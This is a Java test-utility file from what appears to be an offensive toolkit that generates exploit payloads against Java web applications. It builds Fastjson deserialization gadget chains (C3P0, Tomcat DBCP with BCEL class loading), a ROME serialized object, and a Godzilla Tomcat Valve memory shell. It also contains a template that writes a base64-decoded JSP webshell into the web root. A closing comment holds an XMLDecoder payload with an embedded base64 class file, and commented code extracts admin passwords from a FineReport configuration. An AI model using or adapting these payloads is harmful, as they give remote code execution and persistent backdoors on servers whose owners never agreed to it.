package com.droplab.Utils;

import com.droplab.Controller.Seeyon.Common.ROMEObject;
import com.droplab.Utils.Echo.TomcatEcho;
import com.droplab.Utils.Factory.CodeFactory;
import com.droplab.Utils.Memory.MemroyFactory;
import com.sun.org.apache.bcel.internal.classfile.Utility;

import java.io.File;
import java.nio.file.Files;
import java.util.Base64;
import java.util.Random;

public class TestUtils {
    public static void main(String[] args) throws Exception {
        /*//String pattern="<rootManagerPassword>\\s*(<!\\[CDATA\\[)*([_0-9a-zA-Z]*)(\\]\\]>)*\\s*</rootManagerPassword>";
        String pattern="<rootManagerName>\\s*(<!\\[CDATA\\[)*([_\\-0-9a-zA-Z]*)(\\]\\]>)*\\s*</rootManagerName>";
        String content="<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<PrivilegeManager xmlVersion=\"20170715\" releaseVersion=\"8.0.0\" fsSystemManagerPassSet=\"true\" male=\"false\">\n" +
                "<rootManagerName>\n" +
                "<![CDATA[admin]]></rootManagerName>\n" +
                "<rootManagerPassword>___0072002a00670066000sa</rootManagerPassword>\n" +
                "<AP class=\"com.fr.privilege.providers.NoAuthenticationProvider\"/>\n" +
                "<ForwardUrl>\n" +
                "<![CDATA[${servletURL}?op=fr_platform]]></ForwardUrl>\n" +
                "</PrivilegeManager>\n";
        Pattern r = Pattern.compile(pattern);
        Matcher m = r.matcher(content);
        if (m.find()) {
            String group = m.group(2);
            System.out.println(group);
            System.out.println(m.end());
        }*/

        /*String uploadShell = CodeFactory.instance().getUploadShell("com.mchange.v2.c3p0.PoolBackedDataSource",
                CommonUtils.Random(), new File("C:\\Users\\Administrator\\Desktop\\tmp\\godzila\\helps.jsp"));
        String anyCodeExecute = PayloadFactory.instance().getAnyCodeExecute();
        String format = String.format(anyCodeExecute, uploadShell);
        byte[] object = C3P0SerializeObject.instance().getObject(format);
        StringBuffer sb = new StringBuffer();
        sb.append("HexAsciiSerializedMap");
        sb.append('[');
        sb.append(ByteUtils.toHexAscii(object));
        sb.append(']');
        String s = sb.toString();
        //{"a":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"b":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"ffff"}}
        String payload="{\"a\":{\"%s\":\"%s\",\"%s\":\"%s\"},\"b\":{\"%s\":\"%s\",\"%s\":\"%s\"}}";
        String userOverridesAsString = String.format(payload,
                CommonUtils.string2Unicode("@type"),
                CommonUtils.string2Unicode("java.lang.Class"),
                CommonUtils.string2Unicode("val"),
                CommonUtils.string2Unicode("com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"),
                CommonUtils.string2Unicode("@type"),
                CommonUtils.string2Unicode("com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"),
                CommonUtils.string2Unicode("userOverridesAsString"),
                s);
        System.out.println(userOverridesAsString);*/

/*        //String payload = "{\"name\":{\"@type\" : \"java.lang.Class\",\"val\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"},\"x\" : {\"name\": {\"@type\" : \"java.lang.Class\",\"val\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"y\": {\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\": {\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\": {\"@type\" : \"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"%s\",\"$ref\": \"$.x.y.c.connection\"}}}}";
        String payload="{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"},\"b\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"x\":{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"},\"driverClassName\":\"%s\"}}";
        //byte[] decode = Base64.getDecoder().decode(TomcatEcho.instance().getTomcatEcho());
        byte[] decode = Base64.getDecoder().decode(CodeFactory.instance().getUploadShell("com.alibaba.fastjson.JSON", CommonUtils.Random(), new File("C:\\Users\\Administrator\\Desktop\\1\\hellowebform.jsp")));
        String encode = Utility.encode(decode, true);
        System.out.println(encode);
        String format = String.format(payload, "$$BCEL$$" + encode);
        System.out.println(format);*/

        String template = TomcatEcho.instance().getTomcatEchoDefineClass("", "template");
        byte[] decode = Base64.getDecoder().decode(template);

        byte[] object = ROMEObject.instance().getObject(decode);
        Files.write(new File("C:\\language\\java\\source\\DropLabTools\\src\\main\\java\\com\\droplab\\Controller\\Seeyon\\Common\\test.txt").toPath(), object);

        String memoryShell = MemroyFactory.instance().getMemoryShell("Tomcat", "Valve", "password", "Godzilla", "");
        System.out.println(memoryShell);

        String uploadShell = "import java.io.PrintWriter;public class %s {public %s(){PrintWriter bsh = null;try {bsh = new PrintWriter(Thread.currentThread().getContextClassLoader().loadClass(\"%s\").getProtectionDomain().getCodeSource().getLocation().getPath().split(\"WEB-INF\")[0] + \"%s.jsp\");bsh.write(new String(java.util.Base64.getDecoder().decode(\"%s\")));bsh.close();} catch (Exception e) { }}}";

        System.out.println(uploadShell);


    }
}

/*
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="decodeStr">
<string>yv66vgAAADQBSAoAFAC7BwC8CgACALsJAFkAvQkAWQC+CgBZAL8KAFkAwAgAwQoAwgDDCgDCAMQKAMUAxggAxwoAyADJCABtBwDKBwBqCQDLAMwKAA8AzQoAzgDPBwDQCgDLANEKAM4A0goADwDTBwDUCgAYANUKAAIA1gsA1wDYCwDXANkHANoHANsKAB0A3AoAFADdCgAPAN4KAN8AzwoA3wDgBwDhBwDiCgAPAOMKAMIA5AgAmgoAWQDlBwCbCgDCAOYIAOcKADoA6AgAlAcA6QgA6ggA6wgA7AgAlQgAjwgAkAoAFADtCACRBwDuCADvBwDwCQBZAPEKADgA8goAOADzCACTCQBZAPQKAFkA9QgA9ggA9wgA+AgA+QgA+ggA+wgAqAgA/AcA/QgAqQgApQcA/goATAD/CwEAANYHAQILAE8BAwcBBAoATAEFCgA6AQYKAEwA4AoAAgEHCgACAQgKAAIBCQoAAgEKBwELAQADdXJpAQASTGphdmEvbGFuZy9TdHJpbmc7AQAKc2VydmVyTmFtZQEAEHN0YW5kYXJkQ29udGV4dF8BABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAlTaWduYXR1cmUBAEFMamF2YS91dGlsL0FycmF5TGlzdDxMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dDs+OwEAEXN0YW5kYXJkQ29udGV4dF9fAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEACWNsekxvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZAEAAltCAQAGYUNsYXNzAQARTGphdmEvbGFuZy9DbGFzczsBAAtkZWZpbmVDbGFzcwEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADHN0YW5kYXJkQ3R4XwEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEABHRoaXMBAApMYWRkVmFsdmU7AQALc3RhbmRhcmRDdHgBAAFzAQABbwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEADVN0YWNrTWFwVGFibGUHAQsHALwHAPAHANAHANQHAQwHANoBAAhnZXRGaWVsZAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQANZGVjbGFyZWRGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAZvYmplY3QBAAlmaWVsZE5hbWUBAAVjbGF6egcAygcA4QcA4gEACWdldFRocmVhZAEABG5leHQBAANyZXEBAApzZXJ2ZXJQb3J0AQAMc2VydmVyTmFtZU1CAQApTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvYnVmL01lc3NhZ2VCeXRlczsBAAV1cmlNQgEABnRhcmdldAEACnByb2Nlc3NvcnMBAAhpdGVyYXRvcgEAFExqYXZhL3V0aWwvSXRlcmF0b3I7AQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAQ0HAO4BABJnZXRTdGFuZGFyZENvbnRleHQBAApjb250ZXh0S2V5AQAPc3RhbmRhcmRDb250ZXh0AQAFZW50cnkBAAVFbnRyeQEADElubmVyQ2xhc3NlcwEAFUxqYXZhL3V0aWwvTWFwJEVudHJ5OwEACGNoaWxkcmVuAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAC2ppb0VuZFBvaW50AQAHc2VydmljZQEABmVuZ2luZQEAKUxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRFbmdpbmU7AQAMc3RhbmRhcmRIb3N0AQAnTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZEhvc3Q7AQANZW50cnlJdGVyYXRvcgEAUExqYXZhL3V0aWwvTWFwJEVudHJ5PExqYXZhL2xhbmcvU3RyaW5nO0xvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRIb3N0Oz47AQBmTGphdmEvdXRpbC9JdGVyYXRvcjxMamF2YS91dGlsL01hcCRFbnRyeTxMamF2YS9sYW5nL1N0cmluZztMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkSG9zdDs+Oz47BwD9BwD+BwEEBwECAQAGZ2V0U1RDAQAXKClMamF2YS91dGlsL0FycmF5TGlzdDsBAAFpAQABSQEAQygpTGphdmEvdXRpbC9BcnJheUxpc3Q8TG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQ7PjsBAApTb3VyY2VGaWxlAQANYWRkVmFsdmUuamF2YQwAYgBjAQATamF2YS91dGlsL0FycmF5TGlzdAwAXQBeDABhAF4MAI0AYwwAtAC1ARQUJGwkOGIkSSRBJEEkQSRBJEEkQSRBJDhkVyRKeCRUJGQ3JFIkZmUkOWZ1JGVjeiRiNSQ1YyRDJERLJGMyJFIkYzIkbiRoYyRSJE8kSGQkODdiJFQkSW4kOGMkZWRaJDYwJHckOWM0JDVkVk8kZDYkZTIkYjUkYTQkZWMkYWUkOGMkOWQkOTYkZGVNJGVmJHgkM2RJJDhmJGY0SEskOWIkOWUkYTQkZWQkQ3FCaSRkYSRzbSRkYSRhNiRmNyQ3ZCQ5ZiRhMXckOWI2JGJkJGgkM2FPJHgkaCRjOSQ4OCRjMyRkZiRlNyQ3ZCRlZiRjZCRjYyQ5YjdvJGU2JDlmeSRhM0ckOWUkYmMkZWYkVSQ4MCQ4ZExVJGIwJE5jMiRjNiRWJGRjJDg2ZyRjOXgkYjYkODI2JGkkVyQ4YiRlNyRjOHgkYWUkOGMkZTckODkkZTkkZjNlJGJjJG0kODIkWCRlMkUyJDVlJGFjJGUwdiRiY0QkYzJLJDg1JGRjJGNiJFUkY2MkYzQkY2IkRiRlNSRWJFMkNWUkYTkkbSR3NHExJGJlSiRjNiQ5MCQ4Y24kRiRhZiRjNmskYzQkZTckYjUyJDVlJGE3JGUwJE8kYmMkNWUkYzYkODAkODQ3SEgkZDUkZTMkOGR4JDkzJDgyJGM1eCRiMyQ4MiRiNyRlMCQ4OCQ4NCQzYiRWJHkkYzckOTg4JGVlJGFkJEskZGUkODYkYjckOGIkZTUkM2IkODQkZWUkYmIkcSRiY1MkbiRlOXckSiRjMXckOGIkeiRlZlEkUSRjM2EkSnckeHgkSyRkZSRoJGMxJGZicFQkYzEkZmIkZjEkQmEkZDMkM2QyJDNlJHUkYzYkUCRKJGNhJDg3JFYkN2MkRSRsJDk1JGYwMSRGJGFkQiRmNzEkZGMkeGYkbFckZjAkSiQ3Y1IkODIkdCRXJGM3JDg1JGY0JEokRiR0cSQ5ZiQ4NCRKJEokZjczJDg0JGRiJGNkJDljJGU5bmUkSSRjNCRnJEgkWSQ4MiRkYiRmM2kkY2UwJGFiJGRiJGNjJGYxJDllJGUyJGM4JEJuJGVmJGQxJFBYRCQ4OXYkZTckTiRkZCRnJGQwbVMkYWMkY2IkYzQkYTAkOWI1JGokODZIJGY3JDgwbiQ4ZHJzJGE0JDYwJGI1JDkxRjM3JDlhJGwkc24kN2YkYWMkM2JvJFAkYzUkZjUkODJuZHkkZGMkZDAkNWQkZGQyc3okZGMkYzgkZTdyJGRjcCRmM3YkYmMkOWYkZGZaJGU0JDhlJGRidkkxJGE3JDkwJGNmOSRiY00kWSRjOCQ4NiQ4NSR6JEgkZjVRJDNkbiRlOSRiOSRhMXgkZDIkYjUkY2QkZGMkUSRqJHg5JGRjcSRjYyQ3YyQ4ZWFZJDg5JDNkJFd3JGI4JDNkanE3JDlldSRkZEIkN2MkWCQ3ZCQ5MiRiZSRFJEozJDgzJGExJGExJHlmJGQ4JGUzJEY3JGwkZGZuJFckYjIkZGMkVyQ4YSRiMiRiYSQ5MyRkZCRhZCRYJFkkZTYkZmEkZTckVSQ1ZCRkMyQ4YSRlZiRmMiQ4OSRjNCRhZjckYWMkZGIkYmEkZjN6JDlhJGRiJE0kTCR3JHkkZDluJGU5JDhlJGUzMyQ4NCRYJGY0JGQyJDlhYSRjZXQkUmJGJGQyJDNjQyRPJCRLJHkkYWEkOTAkYjB5JGM2JGEyJDViJGM3d3M3JDliTyRMJDNkaW4kOTRCUjckZDhJJE8kYjdMJGM3JHEkZjMkZjkkYTQkZjkkZmUkYWUkamMkRyRfJGI4JGZlJGQ1JGVhJGNjJGRjJFUkZDMkY2MkYzckYmJyJDg1JGEyS04kZTIkZmEkODgkNjAkZTYkZTkkYmMkYTVTJGNjJGNlcSQ5N3ckZDgkYjYkM2UkZGUkNWJ0JHgkYzVCJEgkODhBJDkyTCRhNyRmZiQkJGMyJDg2MSQ5MiRzJGM3JGQ4JDdlJGJjJFlWX2YkNjAkWmQkYmIkaSQzYyQ4NkskYTMkYTEkaWYkODYkZjkkZDUkNjAkaCRfTCRDbiRkZXRnJGI2N20kciRmOSRaSVc3JDg2JHYkM2MkciRiMSRTJGI0JGwkOTBwJDhhUE8kODkkcCRlMVMkOTQkViRNJGNhJDk0JDk3JGkkSiRhNyRyJDdjJDlhSCRjOSQ3YyRkMTYkZjhOUyRlOCQ5ZTkkRiRlMiRXcSQ4OCQ4YSRPJDkwJGM3JGMzJGI3JDk4JFpLJGwkbyQ4NSR3JGskYzRnJFkkYTAkZTIkYjMkZjgkOWMkOGEkODckZjAwJGM1JGEzJGFmNyRiOSQ4N2EkZjYkZmEkY2N6JGJlJHIkYjNxJDlkJGQxJDlhJGRlJDkyJGQxNyQ1ZSRhYiRlMiRmMyRmOCRDJGY5JGFlJHUkZTEkUiRWXyRjNCQ5NyRjOCQ4NyRqJDNiJDkyJFMkYmUkYWMkZTJRJDdjJDg1YlAkODUkM2QkYTckYzAkOGR4JDkyJGg2d28kZTQkZTNJWiRhOSRmOCR3JGJlJHNMJGY4JGJhJDhhbyRlMCQ5YiRFJGEzJGYzJGEwJGE4JGUyJDViJGY4JGI2JDg0JGVmJGE4JGY4JCQkYmUkYTckZTIkZmIkZjgkQiRjNSQ1ZEgkYjUkSSRmNyRiNFQkYzBRJGMyJFBVJGZjJEkkM2YkYTYkYmMkOWUkZTYkM2UkSiQzZlEkZjFTJGVjVSRmMTMkZmMkNWMkYzIkX1QkZmMkUyRiZiRvJGZmJDNiJGM1JDVjJDdjJGM0dCQ4Y3hnR3JHJGViJGM2JGViSyRZJGI0VSRmYyRnJDhmSTgkYTMkZTI3eFgkYzVvJGYxJDNiJFYkYmYkYzckbCRlOCRmZSRlNyRkNCRmNiRrOEgkZTFUJGYxRyRmY0kkYzUkJCRmY1kkYzVfJGYwOCRhNVIkTiRiMCRhYSRmOCR4JGZlJHMkZTEkSiRuJGQ3JHIkZTEkZWYkdyRmZSQ4MSQ3ZiRhYSRmOCQ5N3AkeSQ1YiRhNiRlMiRkZiRmOCQ4ZiQ4YSRmZiRlMiQ3ZiRTJDllVHEkOTZoWCQ3Y1EkZTBSJGEwVSRjNlgkOWQkY2EkQyR5SCRlMVdZJDg4JDg1JGFiJDhjJGYzJDhiJDg1JGNhJGE0JDkybyQ5OSR5JGIxeiQ5NSR2JHlCSSQzZCRWJDdjJDg2JFYkYjVwJDNhJHckZjhOJGJjJHEkZDYkYTkkTCQzYyRhZiRiYyRhYyRpJDYwWHV5JGIwJDlmJGY0UXUkY2VWUiQ3YiRhNyQzYyRjNyRiMCRhNCRiYSRjNCRyJGZkJGIxQiQ0MCRqJGUybiQ5Zm4kZWIkcCRkYyRWJDg1alUkZWMkZmMkOWEkZDlYJGFiJDhjJDg2JGM5bCRkZCRhMiRkY28kYTgkZGMkZTFHJGI1JGFkcSQzZnkkOGEkVSRmYiRkNSQ4OSRkMjFWUyQ4N0IkbyRjOSRjOWokYmMkYmMkeXMkZDF6JGJjJGU0JGUyJFNURyRjOCRwJGU0JGZiJG8kYjlpdSQ4ZCRhYiRkNDB1JGEwJGVjJGJhaSRGJDllJDhhJF9ZJGQ3JDk1cyQ1YyQzZGckOTAkYjYkYzYkTCQzYSRlNiRmYyQ5N0EkYTYkOWQkOWQkN2VlJE0kYzYkZ0UkM2QkNWUkUSRoJGVjJGFjJGIxXyQzYyRhNCRlMlkkViRDJDVkJDNlJGRmJGUxRiRkMTYkZGQkZjE4JHJ4SSRtJDQwN2IkZDgkNWMkYzMkY2I1JCRzJDNlJGE5JEskZDckN2IkYjIkODQkViQ4YSRjNyRNJDNhJGMzJGU2OXdyJDVkJGokbCQ5ZkokM2IkaCRlOCRrJGRiJGYzOSQ5NyQ4ZiRiOSRWVSQ4MkEkYWIkUyRhZiQ3ZSRjZiRnajIkSSRPJFdNJGNhJFAkZDkkY2FLJDgwbCRmMiRmOSQ5YnMkOGUkZDRFViRNJEokM2QkYzEkM2QkYTkkYmUkaiRjNCRvJGQzJGE4JGRhWCRiYSRjZCRkMyQ5MyR1JGRiVkMkZWQkZTB5aiRoJF8kZjYkOGEkJCRiYyRRJDhmJDdjJGU2cCRiNyRjMzAkRSRkMCRmYyQ5ZSRzJGI2XyQ4NEckYzAkYmMkOWYkZmJ3JDVjNCRlOSRYUXkkOGEkOTkkTSR0JGUzJDdjJDlleCRhYmpzSk8kOWYkOWUkVyQ3ZCRVJHIkYTMkZmYkODgkZmIkUyRiNCRhNSQ5NiQ5ZiRFJDljJGE0dCQ3ZSR0VSRIJGFhQWEkQyQ5Nk8kZyRWJGE4JGVmJGNkJDg4JDVkJDVkJDk1dyR5JDdiJDhlJHkkZDhSJERDJDgzJDk3JEokYTJIJDhlJGwkM2EkOTckTSRkNXgkOTkkUyQ5MiRjOCRYJDNkJEUkVyR3JGMwJHFQJGFiJDljJDk1JGNhJG9JaiRYZFZFJGJkJGJmJDk4cyRjZCRSJGVlVyQ4YSRhOUVDJGQ1JGU5ZXIkOWIkZTgybSQ5MyRLYSRjOCR2WCRvJGE1aiRlNSQ3ZiRlMyQ2MCRhZCQzYSRVJGU0YyQ5YyRnJGJkWCRhYyRHJGI3JGYyJGE4JDNlJDNiJF8kZTJfJDhkJGNjMiQ5MSRmYSQ4MlIkYmQkYTgkYTgkYzgkTCR3JGUwUCRkZCQ1ZSRGJGZkJGI0JEwkODkkZTBRJGRiJFUkM2FEJFpPJFgkOTNoJGRkJGQ1NSQ4OSRhYSQ3ZCQ4MmhXJGFiJGU5JHAkOWIkY2EkTSRSJFU3JDNmJGY1JGMwJDk1JGI1JE5UJDNjJEUkViRjMiRhNCRiYiRtVlZuWiRjMSQ5ZSRhYUQkYjgkOGEkN2U3bCQ4MyRmOCRhYiRhMyRYJDk0eiRnJGZhbiRhNyRkNSRHJDg4JFgkViRJNSRqJEgkM2JWYl9PXyQ4NUYkNjA2JDgyJDk4JDgzJGokUSRkZE5JJEkkM2JxJEQkOGRMJDNjJGQ1JHFBJEskQzckbiQ4YyRaRCRnJDViJFQkYWQkZjMkUSRlOFkkZmIkUSRkYiRiYjYkZyRmNCRRJGJhJDkzdSRhZiRmMSRRJDhlSjQkM2YkODIzUTkkUiRhNHUkN2QkbyRhNCQ4NSRhMiQ4YSRXJDNjJDg5SCRBUSRmNSRFZiRxJGMyWjg0JDgxJDk5JHYkOGQkYjYkY2QkOGEkYWEkYzcxJGRiJGMzJDljJEpEUyRjNzE3JG5pUnQka21sJGQ4RyQ5MyRmOSRjZCRlNSRjOSRDJHokcWYkdCRiMCRkMCQ4MyQ5NiQ5MDU5JGJhJGM4JGMzJFYkODl6JGFkJDNlemUkZjgkQiR5TiRGJGEySyQ5MiRhOSRlMCRiZFgkOWFMJDg1JGM0JGQ3JGMzJGIyJDg0JGEyJHZ0JGMyVVp4JEMkY2JJJGY3JGQ1JGE0dSQ4NSQ4NyQ5NSRrVnlYJDlkJDg4aCQ4YSRzJGQzJGRlWCR3JGEwRWhvJGUwJEUkZ2kkYjMkVzkkciRzJGskOWFOY3FCJGQ1VCRQazQkYmFTJGYzJGJlJGEzJFlNJEUkOWIkM2MkYjQkYWNpJDNlJDg5eCRBRyQ5MTkkODF1ayQzZCQ1YyRUJDVkJGVmYSQ4MyQ4NyQ4ZCRrNiRyJDgyJFRoJGE1JGMzJGFlTSQ4NCRlNiRFcSRiZiQ5YyRJJGQ3JGI1SlpQJEwkN2IkZDgkOWNqJDk1JGVhJGVlJGMybCR6JGE0JDg1JEQkTiRhNHIkY2IkZDEkYjNnJGU4JDgyJDg5JEokYjQkYTUkYzQkZmQkZGEkOGYkZTMkM2EkUCQ1YiQ4ZmJmJGQ1JHYkYjN6JHckOTYkYzckdSRPJGNiJGYwOCQ5ZSRjMFokOGFCJDk2JE4kZDMkWSR5JGM1JGYwJE8kYWMkYTAkZWYkN2NIWCQ4MHlYSFIkOGIkODhyJEYkOWFwJHI2JGQxbyRjYXYkeUEkbCQ5NiRvRSQ5YyREJEUkOTBhJGZhJGY5WSRjNCRkNThMUiRiN2MkciRlZSRjNiR3JGRjJDgzJGQ1JGQ0JGVmJGM2JGYwJFkkZyRlOSQ4Y2YkM2EkYTUkODkkZGEkYjM1JGFjJE8kY2QkeSQ4NCRXJGE2JG4kY2UkOTZjJGprJGM0NSRhYyRaJGViWSRDJGgkZDgkTiRkOCRjNCRmNiRhMyQ5NSRkZCQ4YyRjZCR5JDhidiRiMiR1JGMxJHkkYjQkYjFDJGI4JGFlJDg0JGE1JGQzJDk4SyR0JDNjJDhhJGE3JGUyRiRiMiRiNCQ4OXokZTRuJGVjJHNsJGI1JGMzQyRQeiRKTyR2JGkkbiRjYiQ5ZUYkOTYkbCRzJDhiJGZhJDkxJDg0TCRXWSRkOCQ4MyRiZCRhOCR0JGJiejAkODAkN2QkODQkZDEkSCRiMSRPTyR0JGU5JEkkZDkkWCRjMSQ3ZSRlMiQ4YSRlNjEkODJBJGRjJDg0JG0kZDkkZDYkODEkOWIkZjEkTSQ5YSR6JGM3ZiRkYyQ4MmckbyRxJGVjJDg0TiQzYiRjMmRtJEwkZGQkZGEkYTAzJHEkYTYkcE0kYjYkRSRjOEokN2ZvJDQwJGUwJGI5JDhjdTEkZTMkYzgkSSRmYyRkM2wkSVkkZjIkYjdZJGNlJEkkZGYkYTYkODNkJGQzMFEkZmEkbiQ5ZiRyJEhRJGNmaUkkYTA2NCR0JG4kUGoyJEwkYjMkY2UkOTIkdCRlNUokYjIkODQkNWIkclBDJGJlJDg0JGI0JCQkM2EkOGIkODZpJDliJGE4JGU3VSQzYWljJEUkTyRlOSROJGQzJDg5JCQkZjkkODFhJGI0JDk0JDlmJDg3JGZlJFBDJGZhJDVkYiRjYiRRJEEkQQcBDQwBDgEPDAEQAREHARIMARMBFAEAFWphdmEubGFuZy5DbGFzc0xvYWRlcgcBFQwBFgEXAQAPamF2YS9sYW5nL0NsYXNzBwEYDAEZAGwMARoBGwcBHAwBHQEeAQAQamF2YS9sYW5nL09iamVjdAwBHwEgDAEhASIMASMBJAEAE2phdmEvbGFuZy9FeGNlcHRpb24MASUAYwwAlgEmBwEMDAEnASgMAI4BJAEAKG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQBABlvcmcvYXBhY2hlL2NhdGFsaW5hL1ZhbHZlDAELASkMASoBKwwBLAEtBwEuDAEvATABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgwBMQErDAEyATMMAIMAhAwBNAE1AQAEZXhlYwwBNgE3AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAHaGFuZGxlcgEABmdsb2JhbAwBOAE5AQAnb3JnL2FwYWNoZS90b21jYXQvdXRpbC9idWYvTWVzc2FnZUJ5dGVzAQAIc3RyVmFsdWUBABBqYXZhL2xhbmcvU3RyaW5nDABcAFsMAToBNQwBOwE1DABaAFsMAJ4AYwEACEFjY2VwdG9yAQAEaHR0cAEACGVuZHBvaW50AQAFcHJvdG8BAAdhZGFwdGVyAQAJY29ubmVjdG9yAQAJY29udGFpbmVyAQAnb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkRW5naW5lAQARamF2YS91dGlsL0hhc2hNYXAMATwBPQcBPgcBPwEAE2phdmEvdXRpbC9NYXAkRW50cnkMAUABJAEAJW9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZEhvc3QMAUEBPQwBQgFDDAFEATkMAUUBRgwBLwFHDAE2ATkBAAhhZGRWYWx2ZQEAEmphdmEvdXRpbC9JdGVyYXRvcgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAyY29tL3N1bi9vcmcvYXBhY2hlL2JjZWwvaW50ZXJuYWwvY2xhc3NmaWxlL1V0aWxpdHkBAAZkZWNvZGUBABcoTGphdmEvbGFuZy9TdHJpbmc7WilbQgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsBAAdoYXNOZXh0AQADKClaAQAeKExvcmcvYXBhY2hlL2NhdGFsaW5hL1ZhbHZlOylWAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA1nZXRTdXBlcmNsYXNzAQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAh0b1N0cmluZwEACWdldFN0cmluZwEACGVudHJ5U2V0AQARKClMamF2YS91dGlsL1NldDsBAA1qYXZhL3V0aWwvU2V0AQANamF2YS91dGlsL01hcAEACGdldFZhbHVlAQAGa2V5U2V0AQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgEAA2FkZAEABHNpemUBAAMoKUkBABUoSSlMamF2YS9sYW5nL09iamVjdDsAIQBZABQAAAAEAAIAWgBbAAAAAgBcAFsAAAACAF0AXgABAF8AAAACAGAAAgBhAF4AAQBfAAAAAgBgAAUAAQBiAGMAAQBkAAACEwAGAAgAAADGKrcAASq7AAJZtwADtQAEKrsAAlm3AAO1AAUqtgAGKrYAB0wSCE0BTrgACbYACjoELAS4AAs6BRkEEgy2AA06BhkGEg4GvQAPWQMSEFNZBLIAEVNZBbIAEVO2ABI6BxkHBLYAExkHGQQGvQAUWQMZBVNZBAO4ABVTWQUZBb64ABVTtgAWwAAPtgAXTqcACjoEGQS2ABkrtgAaOgQZBLkAGwEAmQAjGQS5ABwBAMAAHToFGQU